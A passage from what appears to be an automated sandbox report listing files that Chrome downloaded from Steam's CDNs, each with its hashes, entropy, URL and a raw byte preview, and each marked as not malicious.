        SSDEEP:768:dubjRojukvorj0dl75P0c6XXx8hyU+MGkpZZfH/NjZyhG+JTp/QLpfJ3yV0IhJGZ:YjIe6z9KBPV3Fnm6qkwQTWsG37
        MD5:8FDA00CB198AD2AF4B12A0B295FE73BE
        SHA1:045920C009B4B55A7C6449F99053225100ADB381
        SHA-256:F0F4B95704FB8A2B017DC89AF96F601CCD464909B02933788A8DE53DB467F517
        SHA-512:88DEE0E0D28D1E6F3BA25B045D77109176F3E0F569737958246051B0F7BE988042C20CA4DEB438BE6BE96079028EB663B5C24E8FAB54F0761CDD7E32AA721E80
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/9424.js?contenthash=b2fd7a2d61c6e49d9951
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..(self.webpackChunkstore=self.webpackChunkstore||[]).push([[9424],{68628:e=>{e.exports={Login:"ZOBYq36SukEm_Fi_77g2q",SideBySide:"_1Wl13domZv872ZcbC_PVbv",GuestContainer:"ERYporYCW1a-i4hFKkqM9",GuestLayout:"_30Wg_JuATv6bZVQSiEOa3n",GuestText:"_1KeaVf4k5xaici5wKntAlv",GuestLink:"_1S9pkF1XVQsK6z-06HLup",QRSection:"_2ZDySoTopw8XofnCKLNxDL",MessagingContainer:"_3ph6wntM-n97-sHIlGQBnD",MessagingTag:"_3jy5Rn5GIHTYnS11f6AxKR",MessagingSubtitleCtn:"_3dSxvAKKoM5S0cN040E9VX",MessagingIcon:"_2H3fBxcnfFRliKqacCx-mk",MessagingSubtitle:"toeaxcVL2sJxvNYVGOeTB",MessagingButton:"-jjqvX7USmuMWI_3UH8vk",MessagingLink:"_1ozceuqRCXj0l4MNlnW_RC",ScanQRButton:"IsYb298MVFqJfTgMC-IrG",QRIcon:"_2zKSqxWHmjgxS59xmS6YFT",QRCodeContainer:"_3YjUmVPnH4QB_0Uthh9BmI",QR:"_1d6FZEReqGY-LD8AuorTdZ",QRHideLink:"_1mk4Aeuk_PYS54ayHqgqHQ",HideButton:"u88sc3K6gPwI9C
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, interlaced
        Category:downloaded
        Size (bytes):1871
        Entropy (8bit):7.348722999646685
        Encrypted:false
        SSDEEP:48:U6wqQNn2x7gtJ3f6gaOO9EI6rjiFYXkNsa:/Y2g6ZOI6fiyUNX
        MD5:27527A60085AF69D263E4FB0019BD33F
        SHA1:22F79CA55A679E13A09E74500AD30C72B66F749C
        SHA-256:7E395F84BB0649858430AC4DCFBD79BF73BB7660D69B9D4FA2501C08F0690CC8
        SHA-512:87A0074CB0A5B109C43556C34486C2A23F40E8726C2A2313757C7EF64473404A7F45E0FDCC5A4F7C8AF0BFE41632BF681AEFC89FC446A8108BCD8C374CA25E62
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images//v6/ico/ico_info.png
        Preview:.PNG........IHDR...4... .....*8k.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:18006B77135211E88773ABA8DAB20EEC" xmpMM:DocumentID="xmp.did:18006B78135211E88773ABA8DAB20EEC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:18006B75135211E88773ABA8DAB20EEC" stRef:documentID="xmp.did:18006B76135211E88773ABA8DAB20EEC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v.......IDATx.b...?.......O.E.....O...A.@.1...K.J..b_..@.@..J.1L...)oA.@.1....@..._..l.j.5.Gb3...Aw.6p.....J.....@....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):217235
        Entropy (8bit):7.987757854906308
        Encrypted:false
        SSDEEP:3072:oYRDGxNiC7DtNKkNzGqG2/prLG0CV9/zbNxuQe2KAh0+T4F/zEiOzM2SPvn7KRW:DgNiOfxt/prir9/3De2zh0PdzEvTSuRW
        MD5:83956CAE24215D1825B49AEC45CF8650
        SHA1:CFC13ACDABCE7A1F72C7A5B5F574ABE4F1EB9C0C
        SHA-256:4F642CBE92EE8DA543E4D1F0C141634148804D988FF7EB93EF58DD4CE57126BF
        SHA-512:361751ECFA361A47081E71E91CDC5D410426A57C6A21250A642C8AC1AFBFAEC115A9CC9D62186A2E70E633A48D974EE84AEC1234B5AF1E35EB0E8516BA58A6F8
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/wccftech.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:24:07+03:00" xmp:ModifyDate="2021-08-03T14:24:07+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:b7da5551-6747-9f4e-915c-68106bcbc435" xmpMM:DocumentID="adobe:docid:photoshop:884c55fe-8081-c24e-8516-543cd6b0da18" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x103, components 3
        Category:downloaded
        Size (bytes):10112
        Entropy (8bit):7.939700934087625
        Encrypted:false
        SSDEEP:192:x9rWDG/2u6dJBk8T5Ku/1EbZaIWzfLllchPcBgn8gJAVn2D4rPU:x4DG/2NdJ68t/1KDWPLcSg8ga2D3
        MD5:3ADCE2979B6247C6977FBE04126ED048
        SHA1:ED10AA3377A1491480B4BF81B8781D3D3DF8B868
        SHA-256:46E86674906F4F1950CFFD8C017F685FB95428505812990E2C4BF55FA8E11CF8
        SHA-512:CB6461867AB70C9CD1EBD477383B6F274CDAEFEBDABF3C0E1FFD88332A515DAA247044D1943189C1E17C812C8A13994B9EDF914E2C057A4DB637978436FACAA5
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256965778/movie.184x123.jpg?t=1692892018
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................g..............................................?..........................!..1A"Qa..#q..2B....3Rr.$..4b....................................4......................!.1A.Q.."qa..#2B.........Rb.............?..k..l0.%JS.].`,m...a*{..P..S....a.....8I...m........LV...E.....CE*&.9.....7S.=R3.Q.....m*...S...\k...*.+TU)JN.........Vg\x...S........B.76.....2... ..4..Y...6..B.vU.<V;....Bw/..j.K.%.P...........U.j...Q........io*S.tW..[M...o...N.:R\.,,..U.c%%..\).x./1..4...|..CN2..rB...E..l.w...*.D.D,bW.k.j>`..U2TpS.wZ..B..u..&...|h..S&..\..eN......J...&B.*:..@7O...@.c....=.5ck...\H.".... 8..IB.WO5*.....|f...\t5...p..RB...........5.].V.6.."..<.9...*.3=.5z.R..e?.%`.Z3.o..........D......c.&.=..Rn....N...7.(z...~b."M..5...i.e..DY.%.-(jI...u.Z...=...3`M[I|..A(.So.]..,k.&r..6..X..-j..K..[M...}.(...C...%kj.U.o..b.cQ
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):227012
        Entropy (8bit):7.985285041807569
        Encrypted:false
        SSDEEP:6144:8cNSj2UuvOsDvFBAQBBk/87mpKYkOkOWLQbBRf:8cNKorzFrBBk/87z1zLQbBRf
        MD5:D2B08C2C0A2F0B110AAD03937A3E3A14
        SHA1:9DCECE7F9E5FB9153E96B224CA4562104FC5A41E
        SHA-256:E63B400C20FFC566B15CC7FC9F9F945AEA18751FDCC9A47D195742078A333C97
        SHA-512:38C9D99A33733C92E25387FAC43A4BCED99D3BDDAD16DFADA34D039D877CE76A464D15E2BE32A290F45D6ABC202F378352E33D1FB8D5B9E37D1FCEE487910EAC
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/pc_gamer_mw_steam.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899, 2023/06/25-20:01:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2023-12-01T15:46:49+02:00" xmp:ModifyDate="2023-12-01T15:46:49+02:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:da48ed39-939b-ba4a-b232-6f73c075c84c" xmpMM:DocumentID="adobe:docid:photoshop:a18b4702-78b7-0e43-8910-46028d8efdd9" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):3355
        Entropy (8bit):5.396115949174596
        Encrypted:false
        SSDEEP:48:jrE1CT8Pi/CCsj5x9cHcYVGwGnrGdrtjcd/UfxGD/CtByLF3vDD+FQyB8pCkP:IawCp8E/0Ec+ByBv+FQyCzP
        MD5:9AF8AAEF60A740E8062CCDA7EFE7C179
        SHA1:1D72FFFE2679D8E55F35C1CEEFA29261C55E0A43
        SHA-256:7173A15A85C666C409667810A53ED83FE73505988FF8496EE65C8EE03D683A6A
        SHA-512:349F5F3958A19BE9B83DE6A18F22786B0C9D79815ABA89F721EE4A2C2DA66098F24794AEA023D84E645F17BCB7A9A5E65EAC331C79530010AA08707329F32114
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/javascript/crypto/rsa.js
        Preview:var RSAPublicKey = function($modulus_hex, $encryptionExponent_hex) {...this.modulus = new BigInteger( $modulus_hex, 16);...this.encryptionExponent = new BigInteger( $encryptionExponent_hex, 16);..};....var Base64 = {...base64: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",...encode: function($input) {....if (!$input) {.....return false;....}....var $output = "";....var $chr1, $chr2, $chr3;....var $enc1, $enc2, $enc3, $enc4;....var $i = 0;....do {.....$chr1 = $input.charCodeAt($i++);.....$chr2 = $input.charCodeAt($i++);.....$chr3 = $input.charCodeAt($i++);.....$enc1 = $chr1 >> 2;.....$enc2 = (($chr1 & 3) << 4) | ($chr2 >> 4);.....$enc3 = (($chr2 & 15) << 2) | ($chr3 >> 6);.....$enc4 = $chr3 & 63;.....if (isNaN($chr2)) $enc3 = $enc4 = 64;.....else if (isNaN($chr3)) $enc4 = 64;.....$output += this.base64.charAt($enc1) + this.base64.charAt($enc2) + this.base64.charAt($enc3) + this.base64.charAt($enc4);....} while ($i < $input.length);....return $output;...},...decode:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (45923), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):86854
        Entropy (8bit):5.23862531830852
        Encrypted:false
        SSDEEP:1536:HUcE8dpksLZdm1Ikj28tlpapoHTvanlGMBvp6MDtZM6UUOCKqM3kk9Y/yKTwId:HUL8dpPm17hlpGoHTelNB8MDM7GzEB92
        MD5:E202A0211BF27E58042E5C178E88CA41
        SHA1:EF34425BB05A24B261E336644E4F6EE292781A5B
        SHA-256:0880DA8AEEBB638DB1F1A2323D72DAC27A66D2522F4315D78A75F71A8B27014C
        SHA-512:072FA21233B5135132193CBE87B7A79781154ED9FB6CFA9AE5B98D47EAEE44AF5BC0A69CB994B515A5242F040E75B80759B4FC7285322486F6F89085224E354F
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main_russian-json.js?contenthash=91bacc56843c5c87e518
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[4860],{29413:e=>{e.exports=JSON.parse('{"language":"russian","CuratorAdmin_RSSFeed_title":".......... RSS-........","CuratorAdmin_RSSFeed_desc":"......... RSS-...... ......... ................ ........ ....... . .......... . Steam .. ... ............ ......... .......... .........: ...... . ...... ..... ............. ....... . ....... ..... ........... . Steam. ","CuratorAdmin_RSSFeed_lang_only":".... ......:","CuratorAdmin_Curator_lang_only":"........ ........: . .......... ........ ...... %1$s ...., . ...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):4885
        Entropy (8bit):7.889061659250527
        Encrypted:false
        SSDEEP:96:eZTacl4Ou+zZIQ+Oql9Q44gMoRmMlEDT9BQXHCenkhSOto/cH:fM40h+O+y4tMog6EDT9BeCen02/cH
        MD5:656419A3E21278B5436923361D73C3B1
        SHA1:C41A2A6EAEB0D9B5582366E9B249BCE797C2F2A7
        SHA-256:3FB6E915493ECDD5E2F78F87FAE06202D41E28432E76CF837896BDA95A50EAC9
        SHA-512:00733B69EDE2DB25BA9C0F7B80161F0B9A6BE226BE3917B8B10B18E43080027E9930EDB4DDAEEB933F1B7CEB3B945FDE3F267FC3AC0C15443069BCB102395942
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1144200/capsule_184x69.jpg?t=1707410886
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................<..........................!..1A.."Qaq..#2BR....3.%r..CD..................................1.......................!.1.Aa...Q..DRq.."#2B...............?....``..%...Gr.....9.8.L...K...0-..T..Hq^.3.Xn..R:.lA(.KE~.&l./.S.)..*.~.......q..#;./.4TP.[.lE.....Z..G.P..me.( ...c..A..S.....;.R...P.R..on../.e,...>|.C..L8......!..._m:..VH.$......YDwSs.CS_K`.%d......|rS......`..`....C.`..<....d`S">..]..a......t0.m.r....S.9...b..&(..4..+.%.7q......._.6..&:..p..)I....u..{'.e.....#.6..j..V.%.IV..jH...1.c.1"EY.u..{.W...,.|j...[-).=b.Pi..T.{n8.Rl.Yr.M.6.....nQP.TJ..q.........`......(`....l`.|.....noze7/..E..Z.P&..,-I)..U.#...3o2..@\4...p..%...-.^...H.H==...f\..j...k...T.)m.#...c&[.n.....^".4.............5%...H*.n.P.....4N..).\.]z.v...l[i*.l.,A.P......&x0...Ze.8...4.6.$..a.]).R.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 293x164, components 3
        Category:dropped
        Size (bytes):17850
        Entropy (8bit):7.97144980176471
        Encrypted:false
        SSDEEP:384:eJF0sJ6qmyUD0t+zBOzDjy2GPffn2LvqkXI8Ofoifc9q81eCf:UF0q6qDUD0t+zSy1ffYvNYlfcYCf
        MD5:0C95BA742ADC944B64C5300CF7C3C7AE
        SHA1:7AB67FF7D7D189022E09EF921B0A51A367750EA1
        SHA-256:4A2D4F9E7894F710FABDC4194166E799E02E14571D31C3C27933FAA9EC485E9C
        SHA-512:A284B7AC751A164FE80AE6ACE4956DCA83459B57AF4FC4F80B41BBA0AAE5D7B2AE7D8AB085DAF40E300A9A55D26976DD28351FCDD9E3BBD58038F5E6B0193890
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................%............................................O.........................!..1."AQa..q..2...#$BRs.....%3....Cbr....45DS.ETUct.................................9.....................!..1.AQ.."2aq.B.....#3CRs...%bc...............?.........@QrI......q,..2..w..u?3..bS...........M.....T.3..g...x.a............9..t.......L-Pze..._.`...M..........l.U[..+.......A.IW....).,..S.U..._.....................>..1s.r..._....3i......C..;.l..#...dUw%yG..R}..&g\."...K8.@H.....:".. ...Y.p._.....-.%,.TM...f...._....B..:.b.I.......VM.J...W#...G.<.\...".m ..c..|+.*x.J.LY.b......!.(..3...%r..i<......N...aTJ.W..UB>z..9...s6..I......2...a..WX0..<u2....[jU..O.........T).0K ...[.o...CY.T.1ySD..~[..6a.m......X.....Q.HU.jd7'.z.^...Z....9y..,.O..E.L]*$.4+#...<...-.&...Jc.."m.x...1.'H..0.9.l....1h....e.kP1 .c'_+i.!..et....g....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, interlaced
        Category:downloaded
        Size (bytes):1249
        Entropy (8bit):6.642855988979977
        Encrypted:false
        SSDEEP:24:+y1he91Wwjx82lY2T3ouVztN9ZDyJ3V9C9TEGJe52Xe7b2H:+wqQNn2xFtl+J3bQEJB2H
        MD5:1048839EDE1F4EFCC80132BCF80A29AC
        SHA1:4C672A862F1FC12C3554FA7B18D0BE10422185EB
        SHA-256:3D124B4A837A8BEA80EA42BD7C3D75ABA32ED95DC51660C7889D8C0C815BB98A
        SHA-512:A3CF2719184497825BFD6B02395AE94ABC9D7D77A6F3C065D91A0364988B7730ED827D0156A233BFE1F9FDCFAF5C9FC99F3E2B874DB3F797069FCC29B728BE8C
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_mac_dark.png
        Preview:.PNG........IHDR...............-.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A40180EEA29F11E6B2A5DB9CBD1A320A" xmpMM:DocumentID="xmp.did:A40180EFA29F11E6B2A5DB9CBD1A320A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A40180ECA29F11E6B2A5DB9CBD1A320A" stRef:documentID="xmp.did:A40180EDA29F11E6B2A5DB9CBD1A320A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..DR...UIDATx.b...?..0..FF..p..T....b.)c.b.. ...@..&..$...|.U..... F4...$...gB...od.....L.b-.........e.@..E.Ia#.._..@W.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:WebM
        Category:downloaded
        Size (bytes):734200
        Entropy (8bit):7.998491896448801
        Encrypted:true
        SSDEEP:12288:1DzXAMKWkFf8Yes6yPbaKPoUj8KL96/QfqwlH4HoRewbxvz1Swfs35bR9uXrT:dUSYeGbaKH8KaQZH4yLfSwYbRET
        MD5:25081476466948E2DF11ADC8C9937804
        SHA1:A8BB6209D8264DE390513E4E44DF781260CE6C32
        SHA-256:40D8DF14959A05AB2648D03121318A336D5B346B997619DC4C76423317B04476
        SHA-512:9B274130212F0C07C1BEFBE3702FEBE0457FAA5455A64455CB8F1372CD7108A6AB7D9192CA2F8FBF4CB121D826A345DF7049CCCBBA28B848ABC9FB9E3BF228D3
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/sale_autumn2019_assets/54b5034d397baccb93181cc6/deck_banner_animated_webm_english.webm?t=1713912919:2f77e586e80191:0
        Preview:.E..B...B...B..B..B..webmB...B....S.g......3..M.t.M..S...I.fS...M..S...T.kS...M..S...T.gS...LM..S...S.kS...3.........X.........................................................................................I.f.*...B@M..Lavf59.27.100WA.HandBrake 1.6.1 2023012300Da..5......D..@........T.k........N..s.....1;;b..."...und..V_VP9...#..|k-.......U..U...U...U...U...U...U....T.g.ss.c..g.E..ENCODERD..Lavf59.27.100ss.c..c.....1;;bg.E..DURATIOND..00:00:07.967000000...C.u'Q.... Y......I.B`:....8$..\.........vo........7.._O...........{......Ufeo.....g..w..?...'......u..H.?...../...Y_.....4*..R......@.v.+...[../....w0..@.....yr.,.,)A]$.C.....8....c9.,..4Q..4...........M..%..qK?.'L.yO.k....O...eN1f.z..6.q...?v.....I..,...:.5_...'..k.]&.Jp.l...P-..b....j ._fD}.O.QU.G..I$....a.;..w...!.......A......a9l..bh.:...._.V...yD.Qs...gzLKj2-d......$;.V.%..._.......}.h>.....I(.>{s....... j..a...../...j..Q.h._V..0.....VU..Y2.w....u...?..DB...&c.5^..!..&.HD./.-Q.&..h9..6.m 8.G.+
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 306x260, components 3
        Category:downloaded
        Size (bytes):34010
        Entropy (8bit):7.52878300717886
        Encrypted:false
        SSDEEP:768:EMFUWzEjY+38I1s6DYy7kMTBuSQv4F2oNw:EFW0YS1s6DP/luS1VNw
        MD5:D9C80B8CADB05B8DFD42DB5D4B76BE78
        SHA1:874470A1A472969CEDD5E7B02F99CFE9AC8F114D
        SHA-256:9A5907EA3DC2990C1587C2865AC819BA956DF55F0A38CD1DF7AB10232DC6FC14
        SHA-512:8ED3D2F09F9E806DF2D5D27B3B26050BFD398A001D5A75D0A83FB781EAE873605844B7CED7AC68CAB1D8397897EF66CEFC9FFA6A938550FBC1366D683BF8D0AE
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/spotlights/108ae946c0ad7e3f3674033b/spotlight_image_english.jpg?t=1715626618
        Preview:......Exif..II*...............4OJP........4Ejumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:410a9eb3-992b-46c1-8f9b-c5778de0b31d.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Qdnamenjumbf manifestcalgfsha256dhashX ?xQ ..R@._uuf.....^..x...v.F.=cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:865973EC115A11EFABA1DA4168878FA9oclaim_generatorx>Adobe_Photoshop/25.6.0 adobe_c2pa/0.7.6-2 c2pa-rs/0.25.2-patchtclaim_generator_info..dnameoAdobe Photoshopgversionf25.6.0.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX Ji.....A0x.$.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:assembler source, ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):17975
        Entropy (8bit):5.234304596583918
        Encrypted:false
        SSDEEP:384:gWNE9NzVI6c4rNORWRyWKPfntY8XiYXUS2qk2VfVQEOHY46ZHnUI7Z0wTmEqNXMi:gWC99VI6c4eWRyJPfnSpYXUS2qk2VfmN
        MD5:2FDE91E2F3BB85F3A585C1982CEC5212
        SHA1:A96CCAE29A05FE0FC0416DFBCCFBE7D0A8BE2749
        SHA-256:B8C231EB652EA06DBB97709A6382739CEEE11EB3861F2D801C0B3989A936FA4E
        SHA-512:268E41D029D4A28BC31E0D36A1143CD17F2F4BDCBFF23FA1339A6D18DC4EE7D67A952D5ED34E609A0FEE2AD030E3B3D6C21283E3611C4679A7A113A889E26280
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/css/login.css?v=L96R4vO7hfOl&l=english
        Preview:...login_modal {...max-width: 502px;...font-family: Arial, Helvetica, sans-serif;...font-size: 12px;..}.....auth_modal_h1 {...color: #67c1f5;...font-size: 24px;...font-weight: normal;..}.....auth_button_h3 {.....font-family: "Motiva Sans", Sans-serif;....font-weight: normal; /* normal */.......font-size: 22px;...font-weight: normal;...color: #ffffff;..}.....auth_button_h5 {...font-size: 13px;...color: #66C0F4;...font-weight: bold;..}.....auth_message_area, .twofactorauth_message_area {...position: relative;...padding-left: 70px;...min-height: 92px;..}.....auth_icon {...position: absolute;...top: 6px;...left: 0px;...width: 67px;...height: 48px;.....background-image: url('https://store.akamai.steamstatic.com/public/shared/images/login/emailauth_icons2.png');...background-repeat: no-repeat;..}.....auth_icon.auth_icon_trash {...background-position: center 0px;..}.....auth_icon.auth_icon_key {...background-position: center -48px;..}.....auth_icon.auth_icon_lock {...background-position: cent
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:dropped
        Size (bytes):13170868
        Entropy (8bit):7.860119304707651
        Encrypted:false
        SSDEEP:196608:MnqyfLa5pERveXuasfdNwx7DrEcxBF7Y7USmN7z/8pqhgDkPomb:Mqyu5pkveezfUx7DrEcfF7Y7UX/lgDw
        MD5:E74E4D157ADCD486BD2BCB7A01947CCD
        SHA1:BF374F383D918B089E9C92AA2A8D1C315E8C5A71
        SHA-256:339D41600CB2677F045C100682026DB67497E7EFC3144F0112C6CE0B84255A91
        SHA-512:3C48F377B1AEB20702E2DDB54C66E13F4B7BE3D0F2A7A444C3F691010DA84DF2CD926F9ACCEEF12F580752024FB406D77D9BCF177732094D114BC30550408E69
        Malicious:false
        Reputation:low
        Preview:GIF89aj.\...1..................................................................................................................................................!..........................#..........!'................$-................. ..#...................#&.)1...... .."..#..#..#-5$..$%(%..%$#&..&..&..&..'..'..'..'..'..(..(..)......%".*(..0/../../../../../../../#.0..4895..6..6..6..6..6".7$.9'";.)<..<..<..<&.=$.=1.>,#?40A..A..D&.E%.E+.F..F#.F*.F+.H0.J..J/"M4'M:2N7,O+.P%.P(.P/.P5"RF>S..W5.X-.X5.Y&.Y*.Z4.[7"[;*[D1`*.`-.d<&eG4f-.fD'i4.j=&k4.k;.mJ4n9.o..oG(v>%w9.w=.zM0{L)|Q7|XB}E%~>..@..I..B..M%.Q0.Y;.L..Q%.T..U1.Y&.]1.oP.X..]:.c'.iB.h1.i:._..g'.h;.s..wA.f..q).q?.~9.yR.V.|,.}A.F.z..4.4./.Y.T./.A.e....<...A.k.V..V..:..g.....w....U..g..2..E..9..H..a..t..U......!..NETSCAPE2.0.....!.......,....j.\....................................................................................................................................................!..........................#........
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):2375
        Entropy (8bit):5.034891669580451
        Encrypted:false
        SSDEEP:48:goUClhKEM0I5EMKMMnMxHETerESRQwe9b+eVeDB0eq6VOPe8HFfye8lCUhkez8Mn:eClhKEM0OEMKM6MxkTebewe9aeVeDB0u
        MD5:7BAA3114E2389272E8B3A3001BD7A210
        SHA1:B564E0589F539175547971422C1E7042801B01EF
        SHA-256:9ACE5CCF7BA2E85D33D19BD36F69E6778C79BD6426A48934BE4E29F7FD98C5F0
        SHA-512:6274E8644D640FC0ACD68C6A9C680BED598E82F61A98D640BE0234AA7BE7CAA383B11718662596F5CEC9A9B6F33DA4F25630DBF4B473A2672110482714DDF6E8
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/css/v6/creator_hub.css?v=e6oxFOI4knLo&l=english
